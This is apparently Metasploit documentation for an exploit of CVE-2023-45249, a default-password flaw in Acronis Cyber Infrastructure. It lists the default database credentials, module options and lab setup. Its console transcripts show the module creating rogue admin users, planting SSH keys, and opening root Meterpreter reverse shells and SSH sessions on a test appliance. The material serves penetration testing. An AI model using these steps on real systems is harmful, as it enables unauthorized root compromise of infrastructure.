|
| 1 | +## Vulnerable Application |
| 2 | +Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage, compute, and network resources. |
| 3 | +Businesses and Service Providers are using it for data storage, backup storage, creating and managing virtual machines and |
| 4 | +software-defined networks,running cloud-native applications in production environments. |
| 5 | +This module exploits a default password vulnerability in ACI which allow an attacker to access the ACI PostgreSQL database |
| 6 | +and gain administrative access to the ACI Web Portal. |
| 7 | +This opens the door for the attacker to upload ssh keys that enables root access to the appliance/server. |
| 8 | + |
| 9 | +This attack can be remotely executed over the WAN as long as the PostgreSQL and SSH services are exposed to the outside world. |
| 10 | +ACI versions `5.0` before build `5.0.1-61`, `5.1` before build `5.1.1-71`, `5.2` before build `5.2.1-69`, `5.3` before build `5.3.1-53`, |
| 11 | +and `5.4` before build `5.4.4-132` are vulnerable. |
| 12 | + |
| 13 | +The following release was tested. |
| 14 | + |
| 15 | +**Acronis Cyber Infrastructure ISO appliances:** |
| 16 | +* Acronis Cyber Infrastructure 4.7 |
| 17 | + |
| 18 | +## Installation steps to install the Acronis Cyber Infrastructure (ACI) appliance |
| 19 | +* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform. |
| 20 | +* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/). |
| 21 | +* Download [ACI iso image](https://care.acronis.com/s/article/63431-Acronis-Cyber-Infrastructure-how-to-download-ISO?language=en_US). |
| 22 | +* Install the iso image in your virtualization engine. |
| 23 | +* When installed, configure the VM appliance to your needs using the menu options. |
| 24 | +* Boot up the VM and should be able to access the Acronis Cyber Infrastructure (ACI) appliance either thru the console, `ssh` on port `22` |
| 25 | +* or via the `webui` via `http://your_aci_ip:8888`. |
| 26 | + |
| 27 | +You are now ready to test the module. |
| 28 | + |
| 29 | +## Verification Steps |
| 30 | +- [ ] Start `msfconsole` |
| 31 | +- [ ] `exploit/linux/http/acronis_cyber_infra_cve_2023_45249` |
| 32 | +- [ ] `set rhosts <ip-target>` |
| 33 | +- [ ] `set rport <port>` |
| 34 | +- [ ] `set lhost <attacker-ip>` |
| 35 | +- [ ] `set target <0=Unix/Linux Command, 1=Interactive SSH>` |
| 36 | +- [ ] `exploit` |
| 37 | +- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings |
| 38 | + |
| 39 | +## Options |
| 40 | + |
| 41 | +### USERNAME |
| 42 | +This option is required and is the username (default: vstoradmin) to authenticate with the PostgreSQL database. |
| 43 | + |
| 44 | +### PASSWORD |
| 45 | +This option is required and is the password (default: vstoradmin) in plain text to authenticate with the PostgreSQL database. |
| 46 | + |
| 47 | +### DATABASE |
| 48 | +This option is required and is the database (default: keystone) which holds the ACI user and password configurations. |
| 49 | + |
| 50 | +### DBPORT |
| 51 | +This option is required and is PostgreSQL database port (default: 5432) to connect to the database. |
| 52 | + |
| 53 | +### SSHPORT |
| 54 | +This option is required and is the SSH port (default: 22) to establish a SSH session. |
| 55 | + |
| 56 | +### PRIV_KEY_FILE |
| 57 | +This option is optional and allows the use of your own SSH private key file in PEM format. |
| 58 | +Generate your SSH private key with following command `ssh-keygen -t rsa -b 2048 -m PEM -f <your_priv_key>` or |
| 59 | +convert your existing SSH private key to PEM format with `ssh-keygen -p -N "" -m PEM -f /path/to/existing/private/key` |
| 60 | +If no key is provided, a SSH private key will be generated for you. |
| 61 | + |
| 62 | +## Scenarios |
| 63 | +```msf |
| 64 | +msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > info |
| 65 | +
|
| 66 | + Name: Acronis Cyber Infrastructure default password remote code execution |
| 67 | + Module: exploit/linux/http/acronis_cyber_infra_cve_2023_45249 |
| 68 | + Platform: Unix, Linux |
| 69 | + Arch: cmd |
| 70 | + Privileged: Yes |
| 71 | + License: Metasploit Framework License (BSD) |
| 72 | + Rank: Excellent |
| 73 | + Disclosed: 2024-07-24 |
| 74 | +
|
| 75 | +Provided by: |
| 76 | + |
| 77 | + Acronis International GmbH |
| 78 | +
|
| 79 | +Module side effects: |
| 80 | + artifacts-on-disk |
| 81 | + ioc-in-logs |
| 82 | +
|
| 83 | +Module stability: |
| 84 | + crash-safe |
| 85 | +
|
| 86 | +Module reliability: |
| 87 | + repeatable-session |
| 88 | +
|
| 89 | +Available targets: |
| 90 | + Id Name |
| 91 | + -- ---- |
| 92 | + => 0 Unix/Linux Command |
| 93 | + 1 Interactive SSH |
| 94 | +
|
| 95 | +Check supported: |
| 96 | + Yes |
| 97 | +
|
| 98 | +Basic options: |
| 99 | + Name Current Setting Required Description |
| 100 | + ---- --------------- -------- ----------- |
| 101 | + DATABASE keystone yes The database to authenticate against |
| 102 | + DBPORT 6432 yes PostgreSQL DB port |
| 103 | + PASSWORD vstoradmin no The password for the specified username. Leave blank for a random password. |
| 104 | + PRIV_KEY_FILE no SSH private key file in PEM format (ssh-keygen -t rsa -b 2048 -m PEM -f <priv_key_file>) |
| 105 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
| 106 | + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-me |
| 107 | + tasploit.html |
| 108 | + RPORT 8888 yes The target port (TCP) |
| 109 | + SSHPORT 22 yes SSH port |
| 110 | + SSL true no Negotiate SSL/TLS for outgoing connections |
| 111 | + TARGETURI / yes Path to the Acronis Cyber Infra application |
| 112 | + USERNAME vstoradmin yes The username to authenticate as |
| 113 | + VHOST no HTTP server virtual host |
| 114 | +
|
| 115 | +Payload information: |
| 116 | +
|
| 117 | +Description: |
| 118 | + Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage, |
| 119 | + compute, and network resources. Businesses and Service Providers are using it for data storage, |
| 120 | + backup storage, creating and managing virtual machines and software-defined networks, running |
| 121 | + cloud-native applications in production environments. |
| 122 | + This module exploits a default password vulnerability in ACI which allow an attacker to access |
| 123 | + the ACI PostgreSQL database and gain administrative access to the ACI Web Portal. |
| 124 | + This opens the door for the attacker to upload SSH keys that enables root access |
| 125 | + to the appliance/server. This attack can be remotely executed over the WAN as long as the |
| 126 | + PostgreSQL and SSH services are exposed to the outside world. |
| 127 | + ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69, |
| 128 | + 5.3 before build 5.3.1-53, and 5.4 before build 5.4.4-132 are vulnerable. |
| 129 | +
|
| 130 | +References: |
| 131 | + https://nvd.nist.gov/vuln/detail/CVE-2023-45249 |
| 132 | + https://security-advisory.acronis.com/advisories/SEC-6452 |
| 133 | + https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249 |
| 134 | +
|
| 135 | +View the full module info with the info -d command. |
| 136 | +``` |
| 137 | +## Scenarios |
| 138 | +### Acronis Cyber Infrastructure 4.7 appliance Unix/Linux command |
| 139 | +```msf |
| 140 | +msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set rhosts 192.168.201.5 |
| 141 | +rhosts => 192.168.201.5 |
| 142 | +msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > check |
| 143 | +[*] 192.168.201.5:8888 - The target appears to be vulnerable. Version 4.7.1-53 |
| 144 | +msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit |
| 145 | +
|
| 146 | +[*] Started reverse TCP handler on 192.168.201.8:4444 |
| 147 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 148 | +[+] The target appears to be vulnerable. Version 4.7.1-53 |
| 149 | +[*] Creating admin user qagkx with password gXv0E2DUU9 for access at the Acronis Admin Portal. |
| 150 | +[*] Saving admin credentials at the msf database. |
| 151 | +[*] Creating SSH private and public key. |
| 152 | +[*] Saving SSH public and private key pair at the msf database. |
| 153 | +[*] Getting the cluster information to upload the SSH public key at the Acronis Admin Portal. |
| 154 | +[*] Uploading SSH public key at the Acronis Admin Portal. |
| 155 | +[*] Authenticating with SSH private key. |
| 156 | +[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp |
| 157 | +[*] Sending stage (3045380 bytes) to 192.168.201.5 |
| 158 | +[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.5:51488) at 2024-09-15 19:45:46 +0000 |
| 159 | +
|
| 160 | +meterpreter > sysinfo |
| 161 | +Computer : aci-471-53.vstoragedomain |
| 162 | +OS : Red Hat 4.7 (Linux 3.10.0-1160.41.1.vz7.183.5) |
| 163 | +Architecture : x64 |
| 164 | +BuildTuple : x86_64-linux-musl |
| 165 | +Meterpreter : x64/linux |
| 166 | +meterpreter > getuid |
| 167 | +Server username: root |
| 168 | +``` |
| 169 | +### Acronis Cyber Infrastructure 4.7 appliance Interactive SSH |
| 170 | +```msf |
| 171 | +msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set target 1 |
| 172 | +target => 1 |
| 173 | +msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit |
| 174 | +
|
| 175 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 176 | +[+] The target appears to be vulnerable. Version 4.7.1-53 |
| 177 | +[*] Creating admin user exvk1 with password NcwVNFNL3t for access at the Acronis Admin Portal. |
| 178 | +[*] Saving admin credentials at the msf database. |
| 179 | +[*] Creating SSH private and public key. |
| 180 | +[*] Saving SSH public and private key pair at the msf database. |
| 181 | +[*] Getting the cluster information to upload the SSH public key at the Acronis Admin Portal. |
| 182 | +[*] Uploading SSH public key at the Acronis Admin Portal. |
| 183 | +[*] Authenticating with SSH private key. |
| 184 | +[*] Executing Interactive SSH for generic/ssh/interact |
| 185 | +[*] SSH session 1 opened (192.168.201.8:36279 -> 192.168.201.5:22) at 2024-09-16 17:56:56 +0000 |
| 186 | +
|
| 187 | +pwd |
| 188 | +/root |
| 189 | +id |
| 190 | +uid=0(root) gid=0(root) groups=0(root) |
| 191 | +uname -a |
| 192 | +Linux aci-471-53.vstoragedomain 3.10.0-1160.41.1.vz7.183.5 #1 SMP Thu Sep 23 18:26:47 MSK 2021 x86_64 x86_64 x86_64 GNU/Linux |
| 193 | +``` |
| 194 | +### Acronis Cyber Infrastructure 4.7 appliance Interactive SSH using your own SSH private key file in PEM format |
| 195 | +```msf |
| 196 | +msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > ssh-keygen -t rsa -b 2048 -m PEM -f /tmp/aci_rsa |
| 197 | +[*] exec: ssh-keygen -t rsa -b 2048 -m PEM -f /tmp/aci_rsa |
| 198 | +
|
| 199 | +Generating public/private rsa key pair. |
| 200 | +Enter passphrase (empty for no passphrase): |
| 201 | +Enter same passphrase again: |
| 202 | +Your identification has been saved in /tmp/aci_rsa |
| 203 | +Your public key has been saved in /tmp/aci_rsa.pub |
| 204 | +The key fingerprint is: |
| 205 | +SHA256:H1Ewu7NLZdYIV4SQZPhsaGkXb/IG9fQgZEjqfKBRTIg root@cerberus |
| 206 | +The key's randomart image is: |
| 207 | ++---[RSA 2048]----+ |
| 208 | +| . +o+B*+oo | |
| 209 | +| E ..oo+=+.o | |
| 210 | +| . o=++.+ o | |
| 211 | +| ==.B=oo. .| |
| 212 | +| .oSo=== . | |
| 213 | +| o Bo | |
| 214 | +| +. | |
| 215 | +| . . | |
| 216 | +| . | |
| 217 | ++----[SHA256]-----+ |
| 218 | +msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set target 1 |
| 219 | +target => 1 |
| 220 | +msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set PRIV_KEY_FILE /tmp/aci_rsa |
| 221 | +PRIV_KEY_FILE => /tmp/aci_rsa |
| 222 | +msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set rhosts 192.168.201.5 |
| 223 | +rhosts => 192.168.201.5 |
| 224 | +msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit |
| 225 | +
|
| 226 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 227 | +[+] The target appears to be vulnerable. Version 4.7.1-53 |
| 228 | +[*] Creating admin user gzarzyh with password XiloxPsdto for access at the Acronis Admin Portal. |
| 229 | +[*] Saving admin credentials at the msf database. |
| 230 | +[*] Using your own SSH private key file: /tmp/aci_rsa in PEM format. |
| 231 | +[*] Saving SSH public and private key pair at the msf database. |
| 232 | +[*] Uploading SSH public key at the Acronis Admin Portal. |
| 233 | +[*] Authenticating with SSH private key. |
| 234 | +[*] Executing Interactive SSH for generic/ssh/interact |
| 235 | +[*] SSH session 1 opened (192.168.201.8:40083 -> 192.168.201.5:22) at 2024-09-20 09:40:22 +0000 |
| 236 | +
|
| 237 | +id |
| 238 | +uid=0(root) gid=0(root) groups=0(root) |
| 239 | +uname -a |
| 240 | +Linux aci-471-53.vstoragedomain 3.10.0-1160.41.1.vz7.183.5 #1 SMP Thu Sep 23 18:26:47 MSK 2021 x86_64 x86_64 x86_64 GNU/Linux |
| 241 | +ls -l .ssh |
| 242 | +total 4 |
| 243 | +-rw------- 1 root root 872 Sep 20 11:40 authorized_keys |
| 244 | +cat .ssh/authorized_keys |
| 245 | +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCauf4JO4xGHWulsoHHOwTXztTvJ4FQz92RTicFIqqHOPvR3vsXkWYJP4vE109/ZnUh64jsMqMb+x66q3+D86rts/ST4smpMjQpL2uwfrn3KHKwVmH7vMYb07q4F8M2nw4TgzYcsXONqAyxmbW0ZJ3P3CdlXXiXMvyUmy55OyVgaBnjoiE1GJxXnssCqPMkf0MaZfZqaaBk3onaKnJ4pRROHe1LEaagSM7dOHjS1F6ViVUYtcfFLQfXj4Q7WsWS5uSUy6HkxDn5PNvzUli7SDJ5aPTDqmmeDjzoVlUl7ZP4CYZlrTpZ1v0C0IuI3qlZmuHPuGaCDN7ymPsRUV71aqv3 root VSTOR-KEY-ID:1966f610-e22a-4147-bec3-4cfb945bdee7 |
| 246 | +``` |
| 247 | + |
| 248 | +## Limitations |
| 249 | +When using your own SSH private key, be aware of the fact that you can not upload the same SSH public key twice via Acronis Web Portal. |
| 250 | +Duplicate SSH public keys are not allowed and the exploit will fail if this occurs. |
0 commit comments